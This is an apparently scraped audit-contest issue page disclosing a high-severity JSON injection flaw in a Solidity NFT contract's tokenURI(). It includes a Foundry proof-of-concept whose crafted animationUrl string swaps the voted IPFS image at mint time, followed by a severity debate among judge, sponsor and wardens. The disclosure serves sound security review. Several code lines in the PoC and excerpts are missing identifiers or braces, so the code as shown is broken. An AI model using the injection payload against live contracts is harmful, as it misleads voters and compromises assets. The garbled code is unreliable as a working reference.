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VerbsToken.tokenURI() is vulnerable to JSON injection attacks #167

c4-bot-1 opened this issue Dec 19, 2023 · 17 comments

VerbsToken.tokenURI() is vulnerable to JSON injection attacks #167

c4-bot-1 opened this issue Dec 19, 2023 · 17 comments
3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working edited-by-warden H-03 high quality report This report is of especially high quality primary issue Highest quality submission among a set of duplicates satisfactory satisfies C4 submission criteria; eligible for awards selected for report This submission will be included/highlighted in the audit report sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity")


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c4-bot-1 commented Dec 19, 2023

Lines of code

Vulnerability details


CultureIndex.createPiece() function doesn't sanitize malicious charcacters in metadata.image and metadata.animationUrl, which would cause VerbsToken.tokenURI() suffering various JSON injection attack vectors.

  1. If the front end APP doesn't process the JSON string properly, such as using eval() to parse token URI, then any malicious code can be executed in the front end. Obviously, funds in users' connected wallet, such as Metamask, might be stolen in this case.

  2. Even while the front end processes securely, such as using the standard builtin JSON.parse() to read URI. Adversary can still exploit this vulnerability to replace art piece image/animation with arbitrary other ones after voting stage completed.
    That is the final metadata used by the NFT (VerbsToken) is not the art piece users vote. This attack could be benefit to attackers, such as creating NFTs containing same art piece data with existing high price NFTs. And this attack could also make the project sufferring legal risks, such as creating NFTs with violence or pornography images.

more reference:

Proof of Concept

As shown of createPiece() function, there is no check if metadata.image and metadata.animationUrl contain malicious charcacters, such as ", : and ,.

File: src\CultureIndex.sol
209:     function createPiece(
210:         ArtPieceMetadata calldata metadata,
211:         CreatorBps[] calldata creatorArray
212:     ) public returns (uint256) {
213:         uint256 creatorArrayLength = validateCreatorsArray(creatorArray);
215:         // Validate the media type and associated data
216:         validateMediaType(metadata);
218:         uint256 pieceId = _currentPieceId++;
220:         /// @dev Insert the new piece into the max heap
221:         maxHeap.insert(pieceId, 0);
223:         ArtPiece storage newPiece = pieces[pieceId];
225:         newPiece.pieceId = pieceId;
226:         newPiece.totalVotesSupply = _calculateVoteWeight(
227:             erc20VotingToken.totalSupply(),
228:             erc721VotingToken.totalSupply()
229:         );
230:         newPiece.totalERC20Supply = erc20VotingToken.totalSupply();
231:         newPiece.metadata = metadata;
232:         newPiece.sponsor = msg.sender;
233:         newPiece.creationBlock = block.number;
234:         newPiece.quorumVotes = (quorumVotesBPS * newPiece.totalVotesSupply) / 10_000;
236:         for (uint i; i < creatorArrayLength; i++) {
237:             newPiece.creators.push(creatorArray[i]);
238:         }
240:         emit PieceCreated(pieceId, msg.sender, metadata, newPiece.quorumVotes, newPiece.totalVotesSupply);
242:         // Emit an event for each creator
243:         for (uint i; i < creatorArrayLength; i++) {
244:             emit PieceCreatorAdded(pieceId, creatorArray[i].creator, msg.sender, creatorArray[i].bps);
245:         }
247:         return newPiece.pieceId;
248:     }

Adverary can exploit this to make VerbsToken.tokenURI() to return various malicious JSON objects to front end APP.

File: src\Descriptor.sol
097:     function constructTokenURI(TokenURIParams memory params) public pure returns (string memory) {
098:         string memory json = string(
099:             abi.encodePacked(
100:                 '{"name":"',
101:       ,
102:                 '", "description":"',
103:                 params.description,
104:                 '", "image": "',
105:                 params.image,
106:                 '", "animation_url": "',
107:                 params.animation_url,
108:                 '"}'
109:             )
110:         );
111:         return string(abi.encodePacked("data:application/json;base64,", Base64.encode(bytes(json))));
112:     }

For example, if attacker submit the following metadata

            name: 'Mona Lisa',
            description: 'A renowned painting by Leonardo da Vinci',
            mediaType: ICultureIndex.MediaType.IMAGE,
            image: 'ipfs://realMonaLisa',
            text: '',
            animationUrl: '", "image": "ipfs://fakeMonaLisa' // malicious string injected

During voting stage, front end gets image field by CultureIndex.pieces[pieceId].metadata.image, which is ipfs://realMonaLisa. But, after voting complete, art piece is minted to VerbsToken NFT. Now, front end would query VerbsToken.tokenURI(tokenId) to get base64 encoded metadata, which would be


In the front end, we use JSON.parse() to parse the above data, we get image as ipfs://fakeMonaLisa.
Image link:

Below is the full coded PoC:

// SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

import {Test} from "forge-std/Test.sol";
import {console2} from "forge-std/console2.sol";
import {RevolutionBuilderTest} from "./RevolutionBuilder.t.sol";
import {ICultureIndex} from "../src/interfaces/ICultureIndex.sol";

contract JsonInjectionAttackTest is RevolutionBuilderTest {
    string public tokenNamePrefix = "Vrb";
    string public tokenName = "Vrbs";
    string public tokenSymbol = "VRBS";

    function setUp() public override {

        super.setERC721TokenParams(tokenName, tokenSymbol, "", tokenNamePrefix);

        super.setCultureIndexParams("Vrbs", "Our community Vrbs. Must be 32x32.", 10, 500, 0);


    function testImageReplacementAttack() public {
        ICultureIndex.CreatorBps[] memory creators = _createArtPieceCreators();
        ICultureIndex.ArtPieceMetadata memory metadata = ICultureIndex.ArtPieceMetadata({
            name: 'Mona Lisa',
            description: 'A renowned painting by Leonardo da Vinci',
            mediaType: ICultureIndex.MediaType.IMAGE,
            image: 'ipfs://realMonaLisa',
            text: '',
            animationUrl: '", "image": "ipfs://fakeMonaLisa' // malicious string injected

        uint256 pieceId = cultureIndex.createPiece(metadata, creators);

        vm.startPrank(address(erc20TokenEmitter));, 10_000e18);
        vm.roll(block.number + 1); // ensure vote snapshot is taken;

        // 1. the image used during voting stage is 'ipfs://realMonaLisa'
        ICultureIndex.ArtPiece memory topPiece = cultureIndex.getTopVotedPiece();
        assertEq(pieceId, topPiece.pieceId);
        assertEq(keccak256("ipfs://realMonaLisa"), keccak256(bytes(topPiece.metadata.image)));

        // 2. after being minted to VerbsToken, the image becomes to 'ipfs://fakeMonaLisa'
        uint256 tokenId =;
        assertEq(pieceId, tokenId);
        string memory encodedURI = erc721Token.tokenURI(tokenId);
        string memory prefix = _substring(encodedURI, 0, 29);
        assertEq(keccak256('data:application/json;base64,'), keccak256(bytes(prefix)));
        string memory actualBase64Encoded = _substring(encodedURI, 29, bytes(encodedURI).length);
        string memory expectedBase64Encoded = 'eyJuYW1lIjoiVnJiIDAiLCAiZGVzY3JpcHRpb24iOiJNb25hIExpc2EuIEEgcmVub3duZWQgcGFpbnRpbmcgYnkgTGVvbmFyZG8gZGEgVmluY2kiLCAiaW1hZ2UiOiAiaXBmczovL3JlYWxNb25hTGlzYSIsICJhbmltYXRpb25fdXJsIjogIiIsICJpbWFnZSI6ICJpcGZzOi8vZmFrZU1vbmFMaXNhIn0=';
        assertEq(keccak256(bytes(expectedBase64Encoded)), keccak256(bytes(actualBase64Encoded)));

    function _createArtPieceCreators() internal pure returns (ICultureIndex.CreatorBps[] memory) {
        ICultureIndex.CreatorBps[] memory creators = new ICultureIndex.CreatorBps[](1);
        creators[0] = ICultureIndex.CreatorBps({creator: address(0xc), bps: 10_000});
        return creators;

    function _substring(string memory str, uint256 startIndex, uint256 endIndex)
        returns (string memory)
        bytes memory strBytes = bytes(str);
        bytes memory result = new bytes(endIndex-startIndex);
        for (uint256 i = startIndex; i < endIndex; i++) {
            result[i - startIndex] = strBytes[i];
        return string(result);

And, test logs:

2023-12-revolutionprotocol\packages\revolution> forge test --match-contract JsonInjectionAttackTest -vv
[⠑] Compiling...
No files changed, compilation skipped

Running 1 test for test/JsonInjectionAttack.t.sol:JsonInjectionAttackTest
[PASS] testImageReplacementAttack() (gas: 1437440)

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 16.30ms
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used

Manually review

Recommended Mitigation Steps

Sanitize input data according:

Assessed type

Invalid Validation

@c4-bot-1 c4-bot-1 added 3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working labels Dec 19, 2023
c4-bot-5 added a commit that referenced this issue Dec 19, 2023
@c4-bot-1 c4-bot-1 changed the title Descriptor contract is vulnerable to JSON injection attacks VerbsToken.tokenURI() is vulnerable to JSON injection attacks Dec 21, 2023
@c4-pre-sort c4-pre-sort added the sufficient quality report This report is of sufficient quality label Dec 22, 2023
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raymondfam marked the issue as sufficient quality report

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raymondfam marked the issue as duplicate of #53

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raymondfam marked the issue as not a duplicate

@c4-pre-sort c4-pre-sort added primary issue Highest quality submission among a set of duplicates and removed duplicate-53 labels Dec 24, 2023
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raymondfam marked the issue as primary issue

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raymondfam marked the issue as high quality report

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rocketman-21 (sponsor) confirmed

@c4-sponsor c4-sponsor added the sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity") label Jan 3, 2024
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Looks like a Medium at the first glance, but after some thought High severity seems appropriate due to assets being compromised in a pretty straight-forward way.

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c4-judge commented Jan 6, 2024

MarioPoneder marked the issue as satisfactory

@c4-judge c4-judge added satisfactory satisfies C4 submission criteria; eligible for awards selected for report This submission will be included/highlighted in the audit report labels Jan 6, 2024
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c4-judge commented Jan 6, 2024

MarioPoneder marked the issue as selected for report

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SovaSlava commented Jan 9, 2024

I think its invalid issue, because:

If the front end APP doesn't process the JSON string properly, such as using eval() to parse token URI, then any malicious code can be executed in the front end. Obviously, funds in users' connected wallet, such as Metamask, might be stolen in this case.

"doesn't process the JSON string properly" - its frontend problem.
" might be stolen in this case" - could not be stolen, because each tx needed user's approve - click on button in Metamask.

  1. Contract should not check dangerous symbols, which potentially could be dangerous to any frontend. Or maybe today some symbols are safe, but tomorrow becomes dangerous..
  2. Attacker could change image, without described case. If image hosted on webserver, which attacker owns, he could change image at any time. And contract not to blame for this

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MarioPoneder commented Jan 9, 2024

Thanks everyone for providing their input on this one.

  1. The front-end part of the present issue is definitely QA but is part of a more severe correctly identified root cause, see point 4.
  2. The purpose of using IPFS is immutability. Thus, the art piece cannot be simply changed on the server. If users vote on an NFT where the underlying art is hosted on a normal webserver, it's user error.
  3. I agree that the provided example findings are QA due to lack of impact on contract/protocol level.
  4. The critical part of this attack is that the art piece (IPFS link) that is voted on will differ from the art piece (IPFS link) in the minted VerbsToken which makes this an issue on protocol level where assets are compromised and users will be misled as a result.

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Thanks everyone for providing their input on this one.

  1. The front-end part of the present issue is definitely QA but is part of a more severe correctly identified root cause, see point 4.
  2. The purpose of using IPFS is immutability. Thus, the art piece cannot be simply changed on the server. If users vote on an NFT where the underlying art is hosted on a normal webserver, it's user error.
  3. I agree that the provided example findings are QA due to lack of impact on contract/protocol level.
  4. The critical part of this attack is that the art piece (IPFS link) that is voted on will differ from the art piece (IPFS link) in the minted VerbsToken which makes this an issue on protocol level where assets are compromised and users will be misled as a result.

But we talk about blockchain project, so user's could and must verify properties of pieces, to whom they give their votes.
So, if user show, that image string have unusual url, he will not vote for this.

If user dont check all data of piece, its user mistake and isnt contract issue

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But we talk about blockchain project, so user's could and must verify properties of pieces, to whom they give their votes. So, if user show, that image string have unusual url, he will not vote for this.

If user dont check all data of piece, its user mistake and isnt contract issue

That's exactly the issue, the initial CultureIndex.pieces[pieceId].metadata.image property users vote on is perfectly valid and the JSON injection becomes "effective" afterwards when minting the NFT.

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But we talk about blockchain project, so user's could and must verify properties of pieces, to whom they give their votes. So, if user show, that image string have unusual url, he will not vote for this.
If user dont check all data of piece, its user mistake and isnt contract issue

That's exactly the issue, the initial CultureIndex.pieces[pieceId].metadata.image property users vote on is perfectly valid and the JSON injection becomes "effective" afterwards when minting the NFT.

But user can see all data of piece before vote for this vote. And user can understand, that it is bad piece with bad code inside..

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MarioPoneder commented Jan 10, 2024

I understand both sides. On the one hand, users have to be careful and review their actions responsibly, but on the other hand it's any protocol's duty to protect users to a certain degree (example: slippage control).
Here, multiple users are put at risk because of one malicious user.
Furthermore, due to the voting mechanism and later minting, users are exposed to a risk that is not as clear to see as if they could see the final NFT from the beginning.
I have to draw the line somewhere and here it becomes evident that the protocol's duty to protect its users outweighs the required user scrutiny.

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Underatand you, thank you for response.
So, maybe you decide downgrade it to medium?

@C4-Staff C4-Staff added the H-03 label Jan 11, 2024
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3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working edited-by-warden H-03 high quality report This report is of especially high quality primary issue Highest quality submission among a set of duplicates satisfactory satisfies C4 submission criteria; eligible for awards selected for report This submission will be included/highlighted in the audit report sponsor confirmed Sponsor agrees this is a problem and intends to fix it (OK to use w/ "disagree with severity")
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9 participants